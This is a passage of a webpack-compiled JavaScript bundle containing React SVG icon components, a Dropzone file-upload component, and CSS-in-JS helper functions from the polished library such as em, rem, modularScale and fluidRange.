        id: 'Symbols',
        stroke: 'none',
        strokeWidth: '1',
        fill: 'none',
        fillRule: 'evenodd' },
      __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
        'g',
        {
          id: '0130-trash2',
          transform: 'translate(-4.000000, -2.000000)' },
        __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
          'mask',
          {
            id: 'mask-2',
            fill: 'white' },
          __WEBPACK_IMPORTED_MODULE_0_react__["createElement"]('use', { xlinkHref: '#path-2' })
        ),
        __WEBPACK_IMPORTED_MODULE_0_react__["createElement"]('use', {
          fill: '#000000',
          fillRule: 'nonzero',
          xlinkHref: '#path-2' })
      )
    )
  );
};


var PlusIcon = function PlusIcon(_ref9) {
  var className = _ref9.className,
      props = _objectWithoutProperties(_ref9, ['className']);

  return __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
    'svg',
    _extends({
      width: '16px',
      height: '16px',
      viewBox: '0 0 19 19',
      version: '1.1',
      xmlns: 'http://www.w3.org/2000/svg',
      xmlnsXlink: 'http://www.w3.org/1999/xlink',
      className: className
    }, props),
    __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
      'defs',
      null,
      __WEBPACK_IMPORTED_MODULE_0_react__["createElement"]('path', {
        d: 'M20.5,12 L12,12 L12,3.49999996 C12,3.22399996 11.776,2.99999995 11.5,2.99999995 C11.224,2.99999995 11,3.22399996 11,3.49999996 L11,12 L2.49999995,12 C2.22399995,12 1.99999995,12.224 1.99999995,12.5 C1.99999995,12.776 2.22399995,13 2.49999995,13 L11,13 L11,21.5 C11,21.776 11.224,22.0000001 11.5,22.0000001 C11.776,22.0000001 12,21.776 12,21.5 L12,13 L20.5,13 C20.776,13 21,12.776 21,12.5 C21,12.224 20.776,12 20.5,12 Z',
        id: 'path-3' })
    ),
    __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
      'g',
      {
        id: 'Symbols',
        stroke: 'none',
        strokeWidth: '1',
        fill: 'none',
        fillRule: 'evenodd' },
      __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
        'g',
        {
          id: '0823-plus',
          transform: 'translate(-2.000000, -3.000000)' },
        __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
          'mask',
          {
            id: 'mask-2',
            fill: 'white' },
          __WEBPACK_IMPORTED_MODULE_0_react__["createElement"]('use', { xlinkHref: '#path-3' })
        ),
        __WEBPACK_IMPORTED_MODULE_0_react__["createElement"]('use', {
          fill: '#000000',
          fillRule: 'nonzero',
          xlinkHref: '#path-3' })
      )
    )
  );
};


var CloseIcon = function CloseIcon(_ref10) {
  var className = _ref10.className,
      props = _objectWithoutProperties(_ref10, ['className']);

  return __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
    'svg',
    _extends({
      xmlns: 'http://www.w3.org/2000/svg',
      xmlnsXlink: 'http://www.w3.org/1999/xlink',
      viewBox: '0 0 24 24',
      width: '24px',
      height: '24px',
      className: cx('CloseIcon', className)
    }, props),
    __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
      'defs',
      null,
      __WEBPACK_IMPORTED_MODULE_0_react__["createElement"]('path', {
        d: 'M12.707 12.5l5.646-5.64600003c.195-.195.195-.512 0-.707-.195-.195-.512-.195-.707 0L12 11.793 6.35399997 6.14699997c-.195-.195-.512-.195-.707 0-.195.195-.195.512 0 .707L11.293 12.5l-5.64600003 5.646c-.195.195-.195.512 0 .707.098.098.226.146.354.146.128 0 .256-.049.354-.146L12.001 13.207l5.646 5.646c.098.098.226.146.354.146.128 0 .256-.049.354-.146.195-.195.195-.512 0-.707L12.709 12.5h-.002z',
        id: 'a' })
    ),
    __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
      'g',
      {
        fill: 'none',
        fillRule: 'evenodd',
        stroke: '#FFF' },
      __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
        'mask',
        {
          id: 'b',
          fill: '#fff' },
        __WEBPACK_IMPORTED_MODULE_0_react__["createElement"]('use', { xlinkHref: '#a' })
      ),
      __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
        'g',
        {
          mask: 'url(#b)',
          fill: '#cccccc',
          stroke: '#979797' },
        __WEBPACK_IMPORTED_MODULE_0_react__["createElement"]('path', { d: 'M.5.5h23v23H.5z' })
      )
    )
  );
};


var MinusIcon = function MinusIcon(_ref11) {
  var className = _ref11.className,
      props = _objectWithoutProperties(_ref11, ['className']);

  return __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
    'svg',
    _extends({
      width: '19px',
      height: '1px',
      viewBox: '0 0 19 1',
      version: '1.1',
      xmlns: 'http://www.w3.org/2000/svg',
      xmlnsXlink: 'http://www.w3.org/1999/xlink',
      className: cx('MinusIcon', className)
    }, props),
    __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
      'defs',
      null,
      __WEBPACK_IMPORTED_MODULE_0_react__["createElement"]('path', {
        d: 'M20.5,13 L2.49999995,13 C2.22399995,13 1.99999995,12.776 1.99999995,12.5 C1.99999995,12.224 2.22399995,12 2.49999995,12 L20.5,12 C20.776,12 21,12.224 21,12.5 C21,12.776 20.776,13 20.5,13 Z',
        id: 'path-5' })
    ),
    __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
      'g',
      {
        id: 'Symbols',
        stroke: 'none',
        strokeWidth: '1',
        fill: 'none',
        fillRule: 'evenodd' },
      __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
        'g',
        {
          id: '0824-minus',
          transform: 'translate(-2.000000, -12.000000)' },
        __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
          'mask',
          {
            id: 'mask-2',
            fill: 'white' },
          __WEBPACK_IMPORTED_MODULE_0_react__["createElement"]('use', { xlinkHref: '#path-5' })
        ),
        __WEBPACK_IMPORTED_MODULE_0_react__["createElement"]('use', {
          fill: '#000000',
          fillRule: 'nonzero',
          xlinkHref: '#path-5' })
      )
    )
  );
};


var ImportIcon = function ImportIcon(_ref12) {
  var className = _ref12.className,
      props = _objectWithoutProperties(_ref12, ['className']);

  return __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
    'svg',
    _extends({
      version: '1.1',
      id: 'Layer_1',
      xmlns: 'http://www.w3.org/2000/svg',
      xmlnsXlink: 'http://www.w3.org/1999/xlink',
      x: '0px',
      y: '0px',
      width: '20px',
      height: '20px',
      viewBox: '0 0 20 20',
      xmlSpace: 'preserve',
      className: cx('ImportIcon', className)
    }, props),
    __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
      'g',
      { transform: 'translate(80 2160)' },
      __WEBPACK_IMPORTED_MODULE_0_react__["createElement"]('path', {
        className: 'st0',
        d: 'M-62.2-2142h-16c-0.8,0-1.5-0.7-1.5-1.5v-2c0-0.3,0.2-0.5,0.5-0.5c0.3,0,0.5,0.2,0.5,0.5v2 c0,0.3,0.2,0.5,0.5,0.5h16c0.3,0,0.5-0.2,0.5-0.5v-2c0-0.3,0.2-0.5,0.5-0.5c0.3,0,0.5,0.2,0.5,0.5v2 C-60.7-2142.7-61.4-2142-62.2-2142z' }),
      __WEBPACK_IMPORTED_MODULE_0_react__["createElement"]('path', {
        className: 'st0',
        d: 'M-64.9-2152.4l-5-5c-0.2-0.2-0.5-0.2-0.7,0l-5,5c-0.2,0.2-0.2,0.5,0,0.7c0.2,0.2,0.5,0.2,0.7,0l4.1-4.1v10.3 c0,0.3,0.2,0.5,0.5,0.5c0.3,0,0.5-0.2,0.5-0.5v-10.3l4.1,4.1c0.1,0.1,0.2,0.1,0.4,0.1c0.1,0,0.3,0,0.4-0.1 C-64.7-2151.9-64.7-2152.2-64.9-2152.4z' })
    )
  );
};


/***/ }),
/* 804 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return Dropzone; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_react_dropzone__ = __webpack_require__(1475);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_react_dropzone___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_react_dropzone__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_classnames_bind__ = __webpack_require__(39);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_classnames_bind___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2_classnames_bind__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_styled_components__ = __webpack_require__(11);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__Dropzone_styl__ = __webpack_require__(3486);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__Dropzone_styl___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_4__Dropzone_styl__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__Spinner_js__ = __webpack_require__(802);
var _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; };

var _createClass = function () { function defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ("value" in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } } return function (Constructor, protoProps, staticProps) { if (protoProps) defineProperties(Constructor.prototype, protoProps); if (staticProps) defineProperties(Constructor, staticProps); return Constructor; }; }();

function _objectWithoutProperties(obj, keys) { var target = {}; for (var i in obj) { if (keys.indexOf(i) >= 0) continue; if (!Object.prototype.hasOwnProperty.call(obj, i)) continue; target[i] = obj[i]; } return target; }

function _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError("Cannot call a class as a function"); } }

function _possibleConstructorReturn(self, call) { if (!self) { throw new ReferenceError("this hasn't been initialised - super() hasn't been called"); } return call && (typeof call === "object" || typeof call === "function") ? call : self; }

function _inherits(subClass, superClass) { if (typeof superClass !== "function" && superClass !== null) { throw new TypeError("Super expression must either be null or a function, not " + typeof superClass); } subClass.prototype = Object.create(superClass && superClass.prototype, { constructor: { value: subClass, enumerable: false, writable: true, configurable: true } }); if (superClass) Object.setPrototypeOf ? Object.setPrototypeOf(subClass, superClass) : subClass.__proto__ = superClass; }






var cx = __WEBPACK_IMPORTED_MODULE_2_classnames_bind___default.a.bind(__WEBPACK_IMPORTED_MODULE_4__Dropzone_styl___default.a);


var DefaultChildren = function DefaultChildren(_ref) {
  var disabled = _ref.disabled,
      message = _ref.message,
      acceptedFileFormatMessage = _ref.acceptedFileFormatMessage;
  return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
    'div',
    { className: cx('default') },
    disabled ? __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_5__Spinner_js__["a" /* Pulse */], null) : __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
      'div',
      null,
      __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement('i', { className: 'fa fa-cloud-upload' }),
      __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
        'h2',
        null,
        message
      ),
      __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
        'h5',
        null,
        acceptedFileFormatMessage
      )
    )
  );
};

var StyledDropzone = __WEBPACK_IMPORTED_MODULE_3_styled_components__["c" /* default */].div.withConfig({
  displayName: 'Dropzone__StyledDropzone',
  componentId: 'sc-32fahv-0'
})(['&&{background:transparent;}']);

/**
 * @module Dropzone
 *
 * Use children to add custom markup to the center of the drop area.
 */

var Dropzone = function (_React$Component) {
  _inherits(Dropzone, _React$Component);

  function Dropzone() {
    _classCallCheck(this, Dropzone);

    return _possibleConstructorReturn(this, (Dropzone.__proto__ || Object.getPrototypeOf(Dropzone)).apply(this, arguments));
  }

  _createClass(Dropzone, [{
    key: 'render',


    /**
     * Note: The .dropzone class is necessary for styling .active state. Passing
     * an empty object to the s prop prevents default inline styling
     */
    value: function render() {
      var _props = this.props,
          className = _props.className,
          children = _props.children,
          disabled = _props.disabled,
          message = _props.message,
          acceptedFileFormatMessage = _props.acceptedFileFormatMessage,
          props = _objectWithoutProperties(_props, ['className', 'children', 'disabled', 'message', 'acceptedFileFormatMessage']);

      return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
        StyledDropzone,
        {
          className: cx('Dropzone', className, { disabled: disabled }),
          'data-nightwatch': 'Upload' },
        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_1_react_dropzone___default.a, _extends({
          className: 'dropzone ' + cx('dropzone'),
          disablePreview: true
        }, props)),
        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
          'div',
          { className: cx('center') },
          children || __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(DefaultChildren, { message: message, disabled: disabled, acceptedFileFormatMessage: acceptedFileFormatMessage })
        )
      );
    }
  }]);

  return Dropzone;
}(__WEBPACK_IMPORTED_MODULE_0_react___default.a.Component);
Dropzone.defaultProps = {
  size: 150,
  multiple: false,
  activeClassName: __WEBPACK_IMPORTED_MODULE_4__Dropzone_styl___default.a.active,
  disabled: false,
  message: 'Drag & Drop File or Click to Upload File',
  acceptedFileFormatMessage: 'text/*,.csv,.pdf'
};

/***/ }),
/* 805 */,
/* 806 */,
/* 807 */,
/* 808 */,
/* 809 */,
/* 810 */,
/* 811 */,
/* 812 */,
/* 813 */,
/* 814 */,
/* 815 */,
/* 816 */,
/* 817 */,
/* 818 */,
/* 819 */,
/* 820 */,
/* 821 */,
/* 822 */,
/* 823 */,
/* 824 */,
/* 825 */,
/* 826 */,
/* 827 */,
/* 828 */,
/* 829 */,
/* 830 */,
/* 831 */,
/* 832 */,
/* 833 */,
/* 834 */,
/* 835 */,
/* 836 */,
/* 837 */,
/* 838 */,
/* 839 */,
/* 840 */,
/* 841 */,
/* 842 */,
/* 843 */,
/* 844 */,
/* 845 */,
/* 846 */,
/* 847 */,
/* 848 */,
/* 849 */,
/* 850 */,
/* 851 */,
/* 852 */,
/* 853 */,
/* 854 */,
/* 855 */,
/* 856 */,
/* 857 */,
/* 858 */,
/* 859 */,
/* 860 */,
/* 861 */,
/* 862 */,
/* 863 */,
/* 864 */,
/* 865 */,
/* 866 */,
/* 867 */,
/* 868 */,
/* 869 */,
/* 870 */,
/* 871 */,
/* 872 */,
/* 873 */,
/* 874 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export adjustHue */
/* unused harmony export animation */
/* unused harmony export backgroundImages */
/* unused harmony export backgrounds */
/* unused harmony export between */
/* unused harmony export border */
/* unused harmony export borderColor */
/* unused harmony export borderRadius */
/* unused harmony export borderStyle */
/* unused harmony export borderWidth */
/* unused harmony export buttons */
/* unused harmony export clearFix */
/* unused harmony export complement */
/* unused harmony export cover */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return curriedDarken; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return curriedDesaturate; });
/* unused harmony export directionalProperty */
/* unused harmony export ellipsis */
/* unused harmony export em */
/* unused harmony export fluidRange */
/* unused harmony export fontFace */
/* unused harmony export getLuminance */
/* unused harmony export getValueAndUnit */
/* unused harmony export grayscale */
/* unused harmony export invert */
/* unused harmony export hideText */
/* unused harmony export hideVisually */
/* unused harmony export hiDPI */
/* unused harmony export hsl */
/* unused harmony export hsla */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return curriedLighten; });
/* unused harmony export margin */
/* unused harmony export mix */
/* unused harmony export modularScale */
/* unused harmony export normalize */
/* unused harmony export opacify */
/* unused harmony export padding */
/* unused harmony export parseToHsl */
/* unused harmony export parseToRgb */
/* unused harmony export placeholder */
/* unused harmony export position */
/* unused harmony export radialGradient */
/* unused harmony export readableColor */
/* unused harmony export rem */
/* unused harmony export retinaImage */
/* unused harmony export rgb */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "d", function() { return rgba; });
/* unused harmony export saturate */
/* unused harmony export selection */
/* unused harmony export setHue */
/* unused harmony export setLightness */
/* unused harmony export setSaturation */
/* unused harmony export shade */
/* unused harmony export size */
/* unused harmony export stripUnit */
/* unused harmony export textInputs */
/* unused harmony export timingFunctions */
/* unused harmony export tint */
/* unused harmony export toColorString */
/* unused harmony export transitions */
/* unused harmony export transparentize */
/* unused harmony export triangle */
/* unused harmony export wordWrap */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__babel_runtime_helpers_esm_extends__ = __webpack_require__(466);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__babel_runtime_helpers_esm_taggedTemplateLiteralLoose__ = __webpack_require__(3500);



// @private
function capitalizeString(string) {
  return string.charAt(0).toUpperCase() + string.slice(1);
}

var positionMap = ['Top', 'Right', 'Bottom', 'Left'];

function generateProperty(property, position) {
  if (!property) return position.toLowerCase();
  var splitProperty = property.split('-');

  if (splitProperty.length > 1) {
    splitProperty.splice(1, 0, position);
    return splitProperty.reduce(function (acc, val) {
      return "" + acc + capitalizeString(val);
    });
  }

  var joinedProperty = property.replace(/([a-z])([A-Z])/g, "$1" + position + "$2");
  return property === joinedProperty ? "" + property + position : joinedProperty;
}

function generateStyles(property, valuesWithDefaults) {
  var styles = {};

  for (var i = 0; i < valuesWithDefaults.length; i += 1) {
    if (valuesWithDefaults[i] || valuesWithDefaults[i] === 0) {
      styles[generateProperty(property, positionMap[i])] = valuesWithDefaults[i];
    }
  }

  return styles;
}
/**
 * Enables shorthand for direction-based properties. It accepts a property (hyphenated or camelCased) and up to four values that map to top, right, bottom, and left, respectively. You can optionally pass an empty string to get only the directional values as properties. You can also optionally pass a null argument for a directional value to ignore it.
 * @example
 * // Styles as object usage
 * const styles = {
 *   ...directionalProperty('padding', '12px', '24px', '36px', '48px')
 * }
 *
 * // styled-components usage
 * const div = styled.div`
 *   ${directionalProperty('padding', '12px', '24px', '36px', '48px')}
 * `
 *
 * // CSS as JS Output
 *
 * div {
 *   'paddingTop': '12px',
 *   'paddingRight': '24px',
 *   'paddingBottom': '36px',
 *   'paddingLeft': '48px'
 * }
 */


function directionalProperty(property) {
  for (var _len = arguments.length, values = new Array(_len > 1 ? _len - 1 : 0), _key = 1; _key < _len; _key++) {
    values[_key - 1] = arguments[_key];
  }

  //  prettier-ignore
  var firstValue = values[0],
      _values$ = values[1],
      secondValue = _values$ === void 0 ? firstValue : _values$,
      _values$2 = values[2],
      thirdValue = _values$2 === void 0 ? firstValue : _values$2,
      _values$3 = values[3],
      fourthValue = _values$3 === void 0 ? secondValue : _values$3;
  var valuesWithDefaults = [firstValue, secondValue, thirdValue, fourthValue];
  return generateStyles(property, valuesWithDefaults);
}

function endsWith (string, suffix) {
  return string.substr(-suffix.length) === suffix;
}

/**
 * Returns a given CSS value minus its unit (or the original value if an invalid string is passed).
 *
 * @example
 * // Styles as object usage
 * const styles = {
 *   '--dimension': stripUnit('100px')
 * }
 *
 * // styled-components usage
 * const div = styled.div`
 *   --dimension: ${stripUnit('100px')}
 * `
 *
 * // CSS in JS Output
 *
 * element {
 *   '--dimension': 100
 * }
 */
function stripUnit(value) {
  var unitlessValue = parseFloat(value);
  if (isNaN(unitlessValue)) return value;
  return unitlessValue;
}

/**
 * Factory function that creates pixel-to-x converters
 * @private
 */

var pxtoFactory = function pxtoFactory(to) {
  return function (pxval, base) {
    if (base === void 0) {
      base = '16px';
    }

    var newPxval = pxval;
    var newBase = base;

    if (typeof pxval === 'string') {
      if (!endsWith(pxval, 'px')) {
        throw new Error("Expected a string ending in \"px\" or a number passed as the first argument to " + to + "(), got \"" + pxval + "\" instead.");
      }

      newPxval = stripUnit(pxval);
    }

    if (typeof base === 'string') {
      if (!endsWith(base, 'px')) {
        throw new Error("Expected a string ending in \"px\" or a number passed as the second argument to " + to + "(), got \"" + base + "\" instead.");
      }

      newBase = stripUnit(base);
    }

    if (typeof newPxval === 'string') {
      throw new Error("Passed invalid pixel value (\"" + pxval + "\") to " + to + "(), please pass a value like \"12px\" or 12.");
    }

    if (typeof newBase === 'string') {
      throw new Error("Passed invalid base value (\"" + base + "\") to " + to + "(), please pass a value like \"12px\" or 12.");
    }

    return "" + newPxval / newBase + to;
  };
};

/**
 * Convert pixel value to ems. The default base value is 16px, but can be changed by passing a
 * second argument to the function.
 * @function
 * @param {string|number} pxval
 * @param {string|number} [base='16px']
 * @example
 * // Styles as object usage
 * const styles = {
 *   'height': em('16px')
 * }
 *
 * // styled-components usage
 * const div = styled.div`
 *   height: ${em('16px')}
 * `
 *
 * // CSS in JS Output
 *
 * element {
 *   'height': '1em'
 * }
 */

var em =
/*#__PURE__*/
pxtoFactory('em');

var cssRegex = /^([+-]?(?:\d+|\d*\.\d+))([a-z]*|%)$/;
/**
 * Returns a given CSS value and its unit as elements of an array.
 *
 * @example
 * // Styles as object usage
 * const styles = {
 *   '--dimension': getValueAndUnit('100px')[0]
 *   '--unit': getValueAndUnit('100px')[1]
 * }
 *
 * // styled-components usage
 * const div = styled.div`
 *   --dimension: ${getValueAndUnit('100px')[0]}
 *   --unit: ${getValueAndUnit('100px')[1]}
 * `
 *
 * // CSS in JS Output
 *
 * element {
 *   '--dimension': 100
 *   '--unit': 'px'
 * }
 */

function getValueAndUnit(value) {
  if (typeof value !== 'string') return [value, ''];
  var matchedValue = value.match(cssRegex);
  if (matchedValue) return [parseFloat(value), matchedValue[2]];
  return [value, undefined];
}

var ratioNames = {
  minorSecond: 1.067,
  majorSecond: 1.125,
  minorThird: 1.2,
  majorThird: 1.25,
  perfectFourth: 1.333,
  augFourth: 1.414,
  perfectFifth: 1.5,
  minorSixth: 1.6,
  goldenSection: 1.618,
  majorSixth: 1.667,
  minorSeventh: 1.778,
  majorSeventh: 1.875,
  octave: 2,
  majorTenth: 2.5,
  majorEleventh: 2.667,
  majorTwelfth: 3,
  doubleOctave: 4
};

function getRatio(ratioName) {
  return ratioNames[ratioName];
}
/**
 * Establish consistent measurements and spacial relationships throughout your projects by incrementing up or down a defined scale. We provide a list of commonly used scales as pre-defined variables.
 * @example
 * // Styles as object usage
 * const styles = {
 *    // Increment two steps up the default scale
 *   'fontSize': modularScale(2)
 * }
 *
 * // styled-components usage
 * const div = styled.div`
 *    // Increment two steps up the default scale
 *   fontSize: ${modularScale(2)}
 * `
 *
 * // CSS in JS Output
 *
 * element {
 *   'fontSize': '1.77689em'
 * }
 */


function modularScale(steps, base, ratio) {
  if (base === void 0) {
    base = '1em';
  }

  if (ratio === void 0) {
    ratio = 'perfectFourth';
  }

  if (typeof steps !== 'number') {
    throw new Error('Please provide a number of steps to the modularScale helper.');
  }

  if (typeof ratio === 'string' && !ratioNames[ratio]) {
    throw new Error('Please pass a number or one of the predefined scales to the modularScale helper as the ratio.');
  }

  var realBase = typeof base === 'string' ? stripUnit(base) : base;
  var realRatio = typeof ratio === 'string' ? getRatio(ratio) : ratio;

  if (typeof realBase === 'string') {
    throw new Error("Invalid value passed as base to modularScale, expected number or em string but got \"" + base + "\"");
  }

  return realBase * Math.pow(realRatio, steps) + "em";
}

/**
 * Convert pixel value to rems. The default base value is 16px, but can be changed by passing a
 * second argument to the function.
 * @function
 * @param {string|number} pxval
 * @param {string|number} [base='16px']
 * @example
 * // Styles as object usage
 * const styles = {
 *   'height': rem('16px')
 * }
 *
 * // styled-components usage
 * const div = styled.div`
 *   height: ${rem('16px')}
 * `
 *
 * // CSS in JS Output
 *
 * element {
 *   'height': '1rem'
 * }
 */

var rem =
/*#__PURE__*/
pxtoFactory('rem');

/**
 * Returns a CSS calc formula for linear interpolation of a property between two values. Accepts optional minScreen (defaults to '320px') and maxScreen (defaults to '1200px').
 *
 * @example
 * // Styles as object usage
 * const styles = {
 *   fontSize: between('20px', '100px', '400px', '1000px'),
 *   fontSize: between('20px', '100px')
 * }
 *
 * // styled-components usage
 * const div = styled.div`
 *   fontSize: ${between('20px', '100px', '400px', '1000px')};
 *   fontSize: ${between('20px', '100px')}
 * `
 *
 * // CSS as JS Output
 *
 * h1: {
 *   'fontSize': 'calc(-33.33333333333334px + 13.333333333333334vw)',
 *   'fontSize': 'calc(-9.090909090909093px + 9.090909090909092vw)'
 * }
 */

function between(fromSize, toSize, minScreen, maxScreen) {
  if (minScreen === void 0) {
    minScreen = '320px';
  }

  if (maxScreen === void 0) {
    maxScreen = '1200px';
  }

  var _getValueAndUnit = getValueAndUnit(fromSize),
      unitlessFromSize = _getValueAndUnit[0],
      fromSizeUnit = _getValueAndUnit[1];

  var _getValueAndUnit2 = getValueAndUnit(toSize),
      unitlessToSize = _getValueAndUnit2[0],
      toSizeUnit = _getValueAndUnit2[1];

  var _getValueAndUnit3 = getValueAndUnit(minScreen),
      unitlessMinScreen = _getValueAndUnit3[0],
      minScreenUnit = _getValueAndUnit3[1];

  var _getValueAndUnit4 = getValueAndUnit(maxScreen),
      unitlessMaxScreen = _getValueAndUnit4[0],
      maxScreenUnit = _getValueAndUnit4[1];

  if (typeof unitlessMinScreen !== 'number' || typeof unitlessMaxScreen !== 'number' || !minScreenUnit || !maxScreenUnit || minScreenUnit !== maxScreenUnit) {
    throw new Error('minScreen and maxScreen must be provided as stringified numbers with the same units.');
  }

  if (typeof unitlessFromSize !== 'number' || typeof unitlessToSize !== 'number' || !fromSizeUnit || !toSizeUnit || fromSizeUnit !== toSizeUnit) {
    throw new Error('fromSize and toSize must be provided as stringified numbers with the same units.');
  }

  var slope = (unitlessFromSize - unitlessToSize) / (unitlessMinScreen - unitlessMaxScreen);
  var base = unitlessToSize - slope * unitlessMaxScreen;
  return "calc(" + base.toFixed(2) + fromSizeUnit + " + " + (100 * slope).toFixed(2) + "vw)";
}

/**
 * CSS to contain a float (credit to CSSMojo).
 *
 * @example
 * // Styles as object usage
 * const styles = {
 *    ...clearFix(),
 * }
 *
 * // styled-components usage
 * const div = styled.div`
 *   ${clearFix()}
 * `
 *
 * // CSS as JS Output
 *
 * '&::after': {
 *   'clear': 'both',
 *   'content': '""',
 *   'display': 'table'
 * }
 */
function clearFix(parent) {
  var _ref;

  if (parent === void 0) {
    parent = '&';
  }

  var pseudoSelector = parent + "::after";
  return _ref = {}, _ref[pseudoSelector] = {
    clear: 'both',
    content: '""',
    display: 'table'
  }, _ref;
}

/**
 * CSS to fully cover an area. Can optionally be passed an offset to act as a "padding".
 *
 * @example
 * // Styles as object usage
 * const styles = {
 *   ...cover()
 * }
 *
 * // styled-components usage
 * const div = styled.div`
 *   ${cover()}
 * `
 *
 * // CSS as JS Output
 *
 * div: {
 *   'position': 'absolute',
 *   'top': '0',
 *   'right: '0',
 *   'bottom': '0',
 *   'left: '0'
 * }
 */
function cover(offset) {
  if (offset === void 0) {
    offset = 0;
  }

  return {
    position: 'absolute',
    top: offset,
    right: offset,
    bottom: offset,
    left: offset
  };
}

/**
 * CSS to represent truncated text with an ellipsis.
 *
 * @example
 * // Styles as object usage
 * const styles = {
 *   ...ellipsis('250px')
 * }
 *
 * // styled-components usage
 * const div = styled.div`
 *   ${ellipsis('250px')}
 * `
 *
 * // CSS as JS Output
 *
 * div: {
 *   'display': 'inline-block',
 *   'maxWidth': '250px',
 *   'overflow': 'hidden',
 *   'textOverflow': 'ellipsis',
 *   'whiteSpace': 'nowrap',
 *   'wordWrap': 'normal'
 * }
 */
function ellipsis(width) {
  if (width === void 0) {
    width = '100%';
  }

  return {
    display: 'inline-block',
    maxWidth: width,
    overflow: 'hidden',
    textOverflow: 'ellipsis',
    whiteSpace: 'nowrap',
    wordWrap: 'normal'
  };
}

/**
 * Returns a set of media queries that resizes a property (or set of properties) between a provided fromSize and toSize. Accepts optional minScreen (defaults to '320px') and maxScreen (defaults to '1200px') to constrain the interpolation.
 *
 * @example
 * // Styles as object usage
 * const styles = {
 *   ...fluidRange(
 *    {
 *        prop: 'padding',
 *        fromSize: '20px',
 *        toSize: '100px',
 *      },
 *      '400px',
 *      '1000px',
 *    )
 * }
 *
 * // styled-components usage
 * const div = styled.div`
 *   ${fluidRange(
 *      {
 *        prop: 'padding',
 *        fromSize: '20px',
 *        toSize: '100px',
 *      },
 *      '400px',
 *      '1000px',
 *    )}
 * `
 *
 * // CSS as JS Output
 *
 * div: {
 *   "@media (min-width: 1000px)": Object {
 *     "padding": "100px",
 *   },
 *   "@media (min-width: 400px)": Object {
 *     "padding": "calc(-33.33333333333334px + 13.333333333333334vw)",
 *   },
 *   "padding": "20px",
 * }
 */
function fluidRange(cssProp, minScreen, maxScreen) {
  if (minScreen === void 0) {
    minScreen = '320px';
  }

  if (maxScreen === void 0) {
    maxScreen = '1200px';
  }

  if (!Array.isArray(cssProp) && typeof cssProp !== 'object' || cssProp === null) {
    throw new Error('expects either an array of objects or a single object with the properties prop, fromSize, and toSize.');
  }

  if (Array.isArray(cssProp)) {
    var mediaQueries = {};
    var fallbacks = {};

    for (var _iterator = cssProp, _isArray = Array.isArray(_iterator), _i = 0, _iterator = _isArray ? _iterator : _iterator[Symbol.iterator]();;) {
      var _extends2, _extends3;

      var _ref;

      if (_isArray) {
        if (_i >= _iterator.length) break;
        _ref = _iterator[_i++];
      } else {
        _i = _iterator.next();
        if (_i.done) break;
        _ref = _i.value;
      }

      var obj = _ref;

      if (!obj.prop || !obj.fromSize || !obj.toSize) {
        throw new Error('expects the objects in the first argument array to have the properties `prop`, `fromSize`, and `toSize`.');
      }

      fallbacks[obj.prop] = obj.fromSize;
